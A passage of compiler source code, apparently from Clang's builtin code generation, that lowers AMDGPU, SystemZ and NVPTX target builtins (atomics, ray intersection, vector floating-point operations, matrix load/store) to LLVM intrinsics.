Function *F = CGM.getIntrinsic(Intrin, { Src0->getType() });
return Builder.CreateCall(F, { Src0, Builder.getFalse() });
}
case AMDGPU::BI__builtin_amdgcn_ds_faddf:
case AMDGPU::BI__builtin_amdgcn_ds_fminf:
case AMDGPU::BI__builtin_amdgcn_ds_fmaxf: {
Intrinsic::ID Intrin;
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_ds_faddf:
Intrin = Intrinsic::amdgcn_ds_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_ds_fminf:
Intrin = Intrinsic::amdgcn_ds_fmin;
break;
case AMDGPU::BI__builtin_amdgcn_ds_fmaxf:
Intrin = Intrinsic::amdgcn_ds_fmax;
break;
}
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
llvm::Value *Src3 = EmitScalarExpr(E->getArg(3));
llvm::Value *Src4 = EmitScalarExpr(E->getArg(4));
llvm::Function *F = CGM.getIntrinsic(Intrin, { Src1->getType() });
llvm::FunctionType *FTy = F->getFunctionType();
llvm::Type *PTy = FTy->getParamType(0);
Src0 = Builder.CreatePointerBitCastOrAddrSpaceCast(Src0, PTy);
return Builder.CreateCall(F, { Src0, Src1, Src2, Src3, Src4 });
}
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f64:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f32:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_v2f16:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmin_f64:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmax_f64:
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fadd_f64:
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmin_f64:
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmax_f64: {
Intrinsic::ID IID;
llvm::Type *ArgTy = llvm::Type::getDoubleTy(getLLVMContext());
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f32:
ArgTy = llvm::Type::getFloatTy(getLLVMContext());
IID = Intrinsic::amdgcn_global_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_v2f16:
ArgTy = llvm::FixedVectorType::get(
llvm::Type::getHalfTy(getLLVMContext()), 2);
IID = Intrinsic::amdgcn_global_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f64:
IID = Intrinsic::amdgcn_global_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmin_f64:
IID = Intrinsic::amdgcn_global_atomic_fmin;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmax_f64:
IID = Intrinsic::amdgcn_global_atomic_fmax;
break;
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fadd_f64:
IID = Intrinsic::amdgcn_flat_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmin_f64:
IID = Intrinsic::amdgcn_flat_atomic_fmin;
break;
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmax_f64:
IID = Intrinsic::amdgcn_flat_atomic_fmax;
break;
}
llvm::Value *Addr = EmitScalarExpr(E->getArg(0));
llvm::Value *Val = EmitScalarExpr(E->getArg(1));
llvm::Function *F =
CGM.getIntrinsic(IID, {ArgTy, Addr->getType(), Val->getType()});
return Builder.CreateCall(F, {Addr, Val});
}
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f64:
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f32: {
Intrinsic::ID IID;
llvm::Type *ArgTy;
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f32:
ArgTy = llvm::Type::getFloatTy(getLLVMContext());
IID = Intrinsic::amdgcn_ds_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f64:
ArgTy = llvm::Type::getDoubleTy(getLLVMContext());
IID = Intrinsic::amdgcn_ds_fadd;
break;
}
llvm::Value *Addr = EmitScalarExpr(E->getArg(0));
llvm::Value *Val = EmitScalarExpr(E->getArg(1));
llvm::Constant *ZeroI32 = llvm::ConstantInt::getIntegerValue(
llvm::Type::getInt32Ty(getLLVMContext()), APInt(32, 0, true));
llvm::Constant *ZeroI1 = llvm::ConstantInt::getIntegerValue(
llvm::Type::getInt1Ty(getLLVMContext()), APInt(1, 0));
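// The remaining llvm.amdgcn.ds.fadd operands -- the ordering, scope and
// isVolatile arguments exposed by the ds_faddf builtin form above -- are
// passed as zeros/false here.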
llvm::Function *F = CGM.getIntrinsic(IID, {ArgTy});
return Builder.CreateCall(F, {Addr, Val, ZeroI32, ZeroI32, ZeroI1});
}
case AMDGPU::BI__builtin_amdgcn_read_exec: {
CallInst *CI = cast<CallInst>(
EmitSpecialRegisterBuiltin(*this, E, Int64Ty, Int64Ty, NormalRead, "exec"));
CI->setConvergent();
return CI;
}
case AMDGPU::BI__builtin_amdgcn_read_exec_lo:
case AMDGPU::BI__builtin_amdgcn_read_exec_hi: {
StringRef RegName = BuiltinID == AMDGPU::BI__builtin_amdgcn_read_exec_lo ?
"exec_lo" : "exec_hi";
CallInst *CI = cast<CallInst>(
EmitSpecialRegisterBuiltin(*this, E, Int32Ty, Int32Ty, NormalRead, RegName));
CI->setConvergent();
return CI;
}
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray:
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray_h:
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray_l:
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray_lh: {
llvm::Value *NodePtr = EmitScalarExpr(E->getArg(0));
llvm::Value *RayExtent = EmitScalarExpr(E->getArg(1));
llvm::Value *RayOrigin = EmitScalarExpr(E->getArg(2));
llvm::Value *RayDir = EmitScalarExpr(E->getArg(3));
llvm::Value *RayInverseDir = EmitScalarExpr(E->getArg(4));
llvm::Value *TextureDescr = EmitScalarExpr(E->getArg(5));
// The builtins take these arguments as vec4 where the last element is
// ignored. The intrinsic takes them as vec3.
RayOrigin = Builder.CreateShuffleVector(RayOrigin, RayOrigin,
ArrayRef<int>{0, 1, 2});
RayDir =
Builder.CreateShuffleVector(RayDir, RayDir, ArrayRef<int>{0, 1, 2});
RayInverseDir = Builder.CreateShuffleVector(RayInverseDir, RayInverseDir,
ArrayRef<int>{0, 1, 2});
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_image_bvh_intersect_ray,
{NodePtr->getType(), RayDir->getType()});
return Builder.CreateCall(F, {NodePtr, RayExtent, RayOrigin, RayDir,
RayInverseDir, TextureDescr});
}
// amdgcn workitem
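// emitRangedBuiltin attaches !range [0, 1024) metadata to the call: 1024 is
// the maximum workgroup dimension, so workitem IDs are known to be below it.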
case AMDGPU::BI__builtin_amdgcn_workitem_id_x:
return emitRangedBuiltin(*this, Intrinsic::amdgcn_workitem_id_x, 0, 1024);
case AMDGPU::BI__builtin_amdgcn_workitem_id_y:
return emitRangedBuiltin(*this, Intrinsic::amdgcn_workitem_id_y, 0, 1024);
case AMDGPU::BI__builtin_amdgcn_workitem_id_z:
return emitRangedBuiltin(*this, Intrinsic::amdgcn_workitem_id_z, 0, 1024);
// amdgcn workgroup size
case AMDGPU::BI__builtin_amdgcn_workgroup_size_x:
return EmitAMDGPUWorkGroupSize(*this, 0);
case AMDGPU::BI__builtin_amdgcn_workgroup_size_y:
return EmitAMDGPUWorkGroupSize(*this, 1);
case AMDGPU::BI__builtin_amdgcn_workgroup_size_z:
return EmitAMDGPUWorkGroupSize(*this, 2);
// amdgcn grid size
case AMDGPU::BI__builtin_amdgcn_grid_size_x:
return EmitAMDGPUGridSize(*this, 0);
case AMDGPU::BI__builtin_amdgcn_grid_size_y:
return EmitAMDGPUGridSize(*this, 1);
case AMDGPU::BI__builtin_amdgcn_grid_size_z:
return EmitAMDGPUGridSize(*this, 2);
// r600 intrinsics
case AMDGPU::BI__builtin_r600_recipsqrt_ieee:
case AMDGPU::BI__builtin_r600_recipsqrt_ieeef:
return emitUnaryBuiltin(*this, E, Intrinsic::r600_recipsqrt_ieee);
case AMDGPU::BI__builtin_r600_read_tidig_x:
return emitRangedBuiltin(*this, Intrinsic::r600_read_tidig_x, 0, 1024);
case AMDGPU::BI__builtin_r600_read_tidig_y:
return emitRangedBuiltin(*this, Intrinsic::r600_read_tidig_y, 0, 1024);
case AMDGPU::BI__builtin_r600_read_tidig_z:
return emitRangedBuiltin(*this, Intrinsic::r600_read_tidig_z, 0, 1024);
case AMDGPU::BI__builtin_amdgcn_alignbit: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
Function *F = CGM.getIntrinsic(Intrinsic::fshr, Src0->getType());
return Builder.CreateCall(F, { Src0, Src1, Src2 });
}
case AMDGPU::BI__builtin_amdgcn_fence: {
if (ProcessOrderScopeAMDGCN(EmitScalarExpr(E->getArg(0)),
EmitScalarExpr(E->getArg(1)), AO, SSID))
return Builder.CreateFence(AO, SSID);
LLVM_FALLTHROUGH;
}
case AMDGPU::BI__builtin_amdgcn_atomic_inc32:
case AMDGPU::BI__builtin_amdgcn_atomic_inc64:
case AMDGPU::BI__builtin_amdgcn_atomic_dec32:
case AMDGPU::BI__builtin_amdgcn_atomic_dec64: {
unsigned BuiltinAtomicOp;
llvm::Type *ResultType = ConvertType(E->getType());
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_atomic_inc32:
case AMDGPU::BI__builtin_amdgcn_atomic_inc64:
BuiltinAtomicOp = Intrinsic::amdgcn_atomic_inc;
break;
case AMDGPU::BI__builtin_amdgcn_atomic_dec32:
case AMDGPU::BI__builtin_amdgcn_atomic_dec64:
BuiltinAtomicOp = Intrinsic::amdgcn_atomic_dec;
break;
}
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
llvm::Function *F =
CGM.getIntrinsic(BuiltinAtomicOp, {ResultType, Ptr->getType()});
if (ProcessOrderScopeAMDGCN(EmitScalarExpr(E->getArg(2)),
EmitScalarExpr(E->getArg(3)), AO, SSID)) {
// llvm.amdgcn.atomic.inc and llvm.amdgcn.atomic.dec expect the ordering and
// scope as unsigned values.
Value *MemOrder = Builder.getInt32(static_cast<int>(AO));
Value *MemScope = Builder.getInt32(static_cast<int>(SSID));
QualType PtrTy = E->getArg(0)->IgnoreImpCasts()->getType();
bool Volatile =
PtrTy->castAs<PointerType>()->getPointeeType().isVolatileQualified();
Value *IsVolatile = Builder.getInt1(static_cast<bool>(Volatile));
return Builder.CreateCall(F, {Ptr, Val, MemOrder, MemScope, IsVolatile});
}
LLVM_FALLTHROUGH;
}
default:
return nullptr;
}
}
/// Handle a SystemZ function in which the final argument is a pointer
/// to an int that receives the post-instruction CC value. At the LLVM level
/// this is represented as a function that returns a {result, cc} pair.
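/// For example, __builtin_s390_vpkshs(a, b, &cc) lowers to a call of
/// llvm.s390.vpkshs returning {result, cc}: element 1 is stored to *cc and
/// element 0 becomes the builtin's return value.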
static Value *EmitSystemZIntrinsicWithCC(CodeGenFunction &CGF,
unsigned IntrinsicID,
const CallExpr *E) {
unsigned NumArgs = E->getNumArgs() - 1;
SmallVector<Value *, 8> Args(NumArgs);
for (unsigned I = 0; I < NumArgs; ++I)
Args[I] = CGF.EmitScalarExpr(E->getArg(I));
Address CCPtr = CGF.EmitPointerWithAlignment(E->getArg(NumArgs));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID);
Value *Call = CGF.Builder.CreateCall(F, Args);
Value *CC = CGF.Builder.CreateExtractValue(Call, 1);
CGF.Builder.CreateStore(CC, CCPtr);
return CGF.Builder.CreateExtractValue(Call, 0);
}
Value *CodeGenFunction::EmitSystemZBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
switch (BuiltinID) {
case SystemZ::BI__builtin_tbegin: {
Value *TDB = EmitScalarExpr(E->getArg(0));
Value *Control = llvm::ConstantInt::get(Int32Ty, 0xff0c);
Function *F = CGM.getIntrinsic(Intrinsic::s390_tbegin);
return Builder.CreateCall(F, {TDB, Control});
}
case SystemZ::BI__builtin_tbegin_nofloat: {
Value *TDB = EmitScalarExpr(E->getArg(0));
Value *Control = llvm::ConstantInt::get(Int32Ty, 0xff0c);
Function *F = CGM.getIntrinsic(Intrinsic::s390_tbegin_nofloat);
return Builder.CreateCall(F, {TDB, Control});
}
case SystemZ::BI__builtin_tbeginc: {
Value *TDB = llvm::ConstantPointerNull::get(Int8PtrTy);
Value *Control = llvm::ConstantInt::get(Int32Ty, 0xff08);
Function *F = CGM.getIntrinsic(Intrinsic::s390_tbeginc);
return Builder.CreateCall(F, {TDB, Control});
}
case SystemZ::BI__builtin_tabort: {
Value *Data = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::s390_tabort);
return Builder.CreateCall(F, Builder.CreateSExt(Data, Int64Ty, "tabort"));
}
case SystemZ::BI__builtin_non_tx_store: {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *Data = EmitScalarExpr(E->getArg(1));
Function *F = CGM.getIntrinsic(Intrinsic::s390_ntstg);
return Builder.CreateCall(F, {Data, Address});
}
// Vector builtins. Note that most vector builtins are mapped automatically
// to target-specific LLVM intrinsics. The ones handled specially here can
// be represented via standard LLVM IR, which is preferable to enable common
// LLVM optimizations.
case SystemZ::BI__builtin_s390_vpopctb:
case SystemZ::BI__builtin_s390_vpopcth:
case SystemZ::BI__builtin_s390_vpopctf:
case SystemZ::BI__builtin_s390_vpopctg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ResultType);
return Builder.CreateCall(F, X);
}
case SystemZ::BI__builtin_s390_vclzb:
case SystemZ::BI__builtin_s390_vclzh:
case SystemZ::BI__builtin_s390_vclzf:
case SystemZ::BI__builtin_s390_vclzg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case SystemZ::BI__builtin_s390_vctzb:
case SystemZ::BI__builtin_s390_vctzh:
case SystemZ::BI__builtin_s390_vctzf:
case SystemZ::BI__builtin_s390_vctzg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case SystemZ::BI__builtin_s390_vfsqsb:
case SystemZ::BI__builtin_s390_vfsqdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt, ResultType);
return Builder.CreateConstrainedFPCall(F, { X });
} else {
Function *F = CGM.getIntrinsic(Intrinsic::sqrt, ResultType);
return Builder.CreateCall(F, X);
}
}
case SystemZ::BI__builtin_s390_vfmasb:
case SystemZ::BI__builtin_s390_vfmadb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y, Z});
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
return Builder.CreateCall(F, {X, Y, Z});
}
}
case SystemZ::BI__builtin_s390_vfmssb:
case SystemZ::BI__builtin_s390_vfmsdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")});
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
return Builder.CreateCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")});
}
}
case SystemZ::BI__builtin_s390_vfnmasb:
case SystemZ::BI__builtin_s390_vfnmadb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
return Builder.CreateFNeg(Builder.CreateConstrainedFPCall(F, {X, Y, Z}), "neg");
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
return Builder.CreateFNeg(Builder.CreateCall(F, {X, Y, Z}), "neg");
}
}
case SystemZ::BI__builtin_s390_vfnmssb:
case SystemZ::BI__builtin_s390_vfnmsdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
Value *NegZ = Builder.CreateFNeg(Z, "sub");
return Builder.CreateFNeg(Builder.CreateConstrainedFPCall(F, {X, Y, NegZ}));
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
Value *NegZ = Builder.CreateFNeg(Z, "neg");
return Builder.CreateFNeg(Builder.CreateCall(F, {X, Y, NegZ}));
}
}
case SystemZ::BI__builtin_s390_vflpsb:
case SystemZ::BI__builtin_s390_vflpdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::fabs, ResultType);
return Builder.CreateCall(F, X);
}
case SystemZ::BI__builtin_s390_vflnsb:
case SystemZ::BI__builtin_s390_vflndb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::fabs, ResultType);
return Builder.CreateFNeg(Builder.CreateCall(F, X), "neg");
}
case SystemZ::BI__builtin_s390_vfisb:
case SystemZ::BI__builtin_s390_vfidb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
// Constant-fold the M4 and M5 mask arguments.
llvm::APSInt M4 = *E->getArg(1)->getIntegerConstantExpr(getContext());
llvm::APSInt M5 = *E->getArg(2)->getIntegerConstantExpr(getContext());
// Check whether this instance can be represented via an LLVM standard
// intrinsic. We only support some combinations of M4 and M5.
Intrinsic::ID ID = Intrinsic::not_intrinsic;
Intrinsic::ID CI;
switch (M4.getZExtValue()) {
default: break;
case 0: // IEEE-inexact exception allowed
switch (M5.getZExtValue()) {
default: break;
case 0: ID = Intrinsic::rint;
CI = Intrinsic::experimental_constrained_rint; break;
}
break;
case 4: // IEEE-inexact exception suppressed
switch (M5.getZExtValue()) {
default: break;
case 0: ID = Intrinsic::nearbyint;
CI = Intrinsic::experimental_constrained_nearbyint; break;
case 1: ID = Intrinsic::round;
CI = Intrinsic::experimental_constrained_round; break;
case 5: ID = Intrinsic::trunc;
CI = Intrinsic::experimental_constrained_trunc; break;
case 6: ID = Intrinsic::ceil;
CI = Intrinsic::experimental_constrained_ceil; break;
case 7: ID = Intrinsic::floor;
CI = Intrinsic::experimental_constrained_floor; break;
}
break;
}
if (ID != Intrinsic::not_intrinsic) {
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(CI, ResultType);
return Builder.CreateConstrainedFPCall(F, X);
} else {
Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, X);
}
}
switch (BuiltinID) { // FIXME: constrained version?
case SystemZ::BI__builtin_s390_vfisb: ID = Intrinsic::s390_vfisb; break;
case SystemZ::BI__builtin_s390_vfidb: ID = Intrinsic::s390_vfidb; break;
default: llvm_unreachable("Unknown BuiltinID");
}
Function *F = CGM.getIntrinsic(ID);
Value *M4Value = llvm::ConstantInt::get(getLLVMContext(), M4);
Value *M5Value = llvm::ConstantInt::get(getLLVMContext(), M5);
return Builder.CreateCall(F, {X, M4Value, M5Value});
}
case SystemZ::BI__builtin_s390_vfmaxsb:
case SystemZ::BI__builtin_s390_vfmaxdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
// Constant-fold the M4 mask argument.
llvm::APSInt M4 = *E->getArg(2)->getIntegerConstantExpr(getContext());
// Check whether this instance can be represented via an LLVM standard
// intrinsic. We only support some values of M4.
Intrinsic::ID ID = Intrinsic::not_intrinsic;
Intrinsic::ID CI;
switch (M4.getZExtValue()) {
default: break;
case 4: ID = Intrinsic::maxnum;
CI = Intrinsic::experimental_constrained_maxnum; break;
}
if (ID != Intrinsic::not_intrinsic) {
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(CI, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y});
} else {
Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, {X, Y});
}
}
switch (BuiltinID) {
case SystemZ::BI__builtin_s390_vfmaxsb: ID = Intrinsic::s390_vfmaxsb; break;
case SystemZ::BI__builtin_s390_vfmaxdb: ID = Intrinsic::s390_vfmaxdb; break;
default: llvm_unreachable("Unknown BuiltinID");
}
Function *F = CGM.getIntrinsic(ID);
Value *M4Value = llvm::ConstantInt::get(getLLVMContext(), M4);
return Builder.CreateCall(F, {X, Y, M4Value});
}
case SystemZ::BI__builtin_s390_vfminsb:
case SystemZ::BI__builtin_s390_vfmindb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
// Constant-fold the M4 mask argument.
llvm::APSInt M4 = *E->getArg(2)->getIntegerConstantExpr(getContext());
// Check whether this instance can be represented via an LLVM standard
// intrinsic. We only support some values of M4.
Intrinsic::ID ID = Intrinsic::not_intrinsic;
Intrinsic::ID CI;
switch (M4.getZExtValue()) {
default: break;
case 4: ID = Intrinsic::minnum;
CI = Intrinsic::experimental_constrained_minnum; break;
}
if (ID != Intrinsic::not_intrinsic) {
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(CI, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y});
} else {
Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, {X, Y});
}
}
switch (BuiltinID) {
case SystemZ::BI__builtin_s390_vfminsb: ID = Intrinsic::s390_vfminsb; break;
case SystemZ::BI__builtin_s390_vfmindb: ID = Intrinsic::s390_vfmindb; break;
default: llvm_unreachable("Unknown BuiltinID");
}
Function *F = CGM.getIntrinsic(ID);
Value *M4Value = llvm::ConstantInt::get(getLLVMContext(), M4);
return Builder.CreateCall(F, {X, Y, M4Value});
}
case SystemZ::BI__builtin_s390_vlbrh:
case SystemZ::BI__builtin_s390_vlbrf:
case SystemZ::BI__builtin_s390_vlbrg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::bswap, ResultType);
return Builder.CreateCall(F, X);
}
// Vector intrinsics that output the post-instruction CC value.
#define INTRINSIC_WITH_CC(NAME) \
case SystemZ::BI__builtin_##NAME: \
return EmitSystemZIntrinsicWithCC(*this, Intrinsic::NAME, E)
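// For instance, INTRINSIC_WITH_CC(s390_vpkshs) expands to:
//   case SystemZ::BI__builtin_s390_vpkshs:
//     return EmitSystemZIntrinsicWithCC(*this, Intrinsic::s390_vpkshs, E);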
INTRINSIC_WITH_CC(s390_vpkshs);
INTRINSIC_WITH_CC(s390_vpksfs);
INTRINSIC_WITH_CC(s390_vpksgs);
INTRINSIC_WITH_CC(s390_vpklshs);
INTRINSIC_WITH_CC(s390_vpklsfs);
INTRINSIC_WITH_CC(s390_vpklsgs);
INTRINSIC_WITH_CC(s390_vceqbs);
INTRINSIC_WITH_CC(s390_vceqhs);
INTRINSIC_WITH_CC(s390_vceqfs);
INTRINSIC_WITH_CC(s390_vceqgs);
INTRINSIC_WITH_CC(s390_vchbs);
INTRINSIC_WITH_CC(s390_vchhs);
INTRINSIC_WITH_CC(s390_vchfs);
INTRINSIC_WITH_CC(s390_vchgs);
INTRINSIC_WITH_CC(s390_vchlbs);
INTRINSIC_WITH_CC(s390_vchlhs);
INTRINSIC_WITH_CC(s390_vchlfs);
INTRINSIC_WITH_CC(s390_vchlgs);
INTRINSIC_WITH_CC(s390_vfaebs);
INTRINSIC_WITH_CC(s390_vfaehs);
INTRINSIC_WITH_CC(s390_vfaefs);
INTRINSIC_WITH_CC(s390_vfaezbs);
INTRINSIC_WITH_CC(s390_vfaezhs);
INTRINSIC_WITH_CC(s390_vfaezfs);
INTRINSIC_WITH_CC(s390_vfeebs);
INTRINSIC_WITH_CC(s390_vfeehs);
INTRINSIC_WITH_CC(s390_vfeefs);
INTRINSIC_WITH_CC(s390_vfeezbs);
INTRINSIC_WITH_CC(s390_vfeezhs);
INTRINSIC_WITH_CC(s390_vfeezfs);
INTRINSIC_WITH_CC(s390_vfenebs);
INTRINSIC_WITH_CC(s390_vfenehs);
INTRINSIC_WITH_CC(s390_vfenefs);
INTRINSIC_WITH_CC(s390_vfenezbs);
INTRINSIC_WITH_CC(s390_vfenezhs);
INTRINSIC_WITH_CC(s390_vfenezfs);
INTRINSIC_WITH_CC(s390_vistrbs);
INTRINSIC_WITH_CC(s390_vistrhs);
INTRINSIC_WITH_CC(s390_vistrfs);
INTRINSIC_WITH_CC(s390_vstrcbs);
INTRINSIC_WITH_CC(s390_vstrchs);
INTRINSIC_WITH_CC(s390_vstrcfs);
INTRINSIC_WITH_CC(s390_vstrczbs);
INTRINSIC_WITH_CC(s390_vstrczhs);
INTRINSIC_WITH_CC(s390_vstrczfs);
INTRINSIC_WITH_CC(s390_vfcesbs);
INTRINSIC_WITH_CC(s390_vfcedbs);
INTRINSIC_WITH_CC(s390_vfchsbs);
INTRINSIC_WITH_CC(s390_vfchdbs);
INTRINSIC_WITH_CC(s390_vfchesbs);
INTRINSIC_WITH_CC(s390_vfchedbs);
INTRINSIC_WITH_CC(s390_vftcisb);
INTRINSIC_WITH_CC(s390_vftcidb);
INTRINSIC_WITH_CC(s390_vstrsb);
INTRINSIC_WITH_CC(s390_vstrsh);
INTRINSIC_WITH_CC(s390_vstrsf);
INTRINSIC_WITH_CC(s390_vstrszb);
INTRINSIC_WITH_CC(s390_vstrszh);
INTRINSIC_WITH_CC(s390_vstrszf);
#undef INTRINSIC_WITH_CC
default:
return nullptr;
}
}
namespace {
// Helper classes for mapping MMA builtins to their corresponding LLVM
// intrinsic variants.
struct NVPTXMmaLdstInfo {
unsigned NumResults; // Number of elements to load/store
// Intrinsic IDs for the row/col variants; 0 if a particular layout is
// unsupported.
unsigned IID_col;
unsigned IID_row;
};
#define MMA_INTR(geom_op_type, layout) \
Intrinsic::nvvm_wmma_##geom_op_type##_##layout##_stride
#define MMA_LDST(n, geom_op_type) \
{ n, MMA_INTR(geom_op_type, col), MMA_INTR(geom_op_type, row) }
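// For example, MMA_LDST(8, m16n16k16_load_a_f16) expands to
// {8, Intrinsic::nvvm_wmma_m16n16k16_load_a_f16_col_stride,
//     Intrinsic::nvvm_wmma_m16n16k16_load_a_f16_row_stride}.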
static NVPTXMmaLdstInfo getNVPTXMmaLdstInfo(unsigned BuiltinID) {
switch (BuiltinID) {
// FP MMA loads
case NVPTX::BI__hmma_m16n16k16_ld_a:
return MMA_LDST(8, m16n16k16_load_a_f16);
case NVPTX::BI__hmma_m16n16k16_ld_b:
return MMA_LDST(8, m16n16k16_load_b_f16);
case NVPTX::BI__hmma_m16n16k16_ld_c_f16:
return MMA_LDST(4, m16n16k16_load_c_f16);
case NVPTX::BI__hmma_m16n16k16_ld_c_f32:
return MMA_LDST(8, m16n16k16_load_c_f32);
case NVPTX::BI__hmma_m32n8k16_ld_a:
return MMA_LDST(8, m32n8k16_load_a_f16);
case NVPTX::BI__hmma_m32n8k16_ld_b:
return MMA_LDST(8, m32n8k16_load_b_f16);
case NVPTX::BI__hmma_m32n8k16_ld_c_f16:
return MMA_LDST(4, m32n8k16_load_c_f16);
case NVPTX::BI__hmma_m32n8k16_ld_c_f32:
return MMA_LDST(8, m32n8k16_load_c_f32);
case NVPTX::BI__hmma_m8n32k16_ld_a:
return MMA_LDST(8, m8n32k16_load_a_f16);
case NVPTX::BI__hmma_m8n32k16_ld_b:
return MMA_LDST(8, m8n32k16_load_b_f16);
case NVPTX::BI__hmma_m8n32k16_ld_c_f16:
return MMA_LDST(4, m8n32k16_load_c_f16);
case NVPTX::BI__hmma_m8n32k16_ld_c_f32:
return MMA_LDST(8, m8n32k16_load_c_f32);
// Integer MMA loads
case NVPTX::BI__imma_m16n16k16_ld_a_s8:
return MMA_LDST(2, m16n16k16_load_a_s8);
case NVPTX::BI__imma_m16n16k16_ld_a_u8:
return MMA_LDST(2, m16n16k16_load_a_u8);
case NVPTX::BI__imma_m16n16k16_ld_b_s8:
return MMA_LDST(2, m16n16k16_load_b_s8);
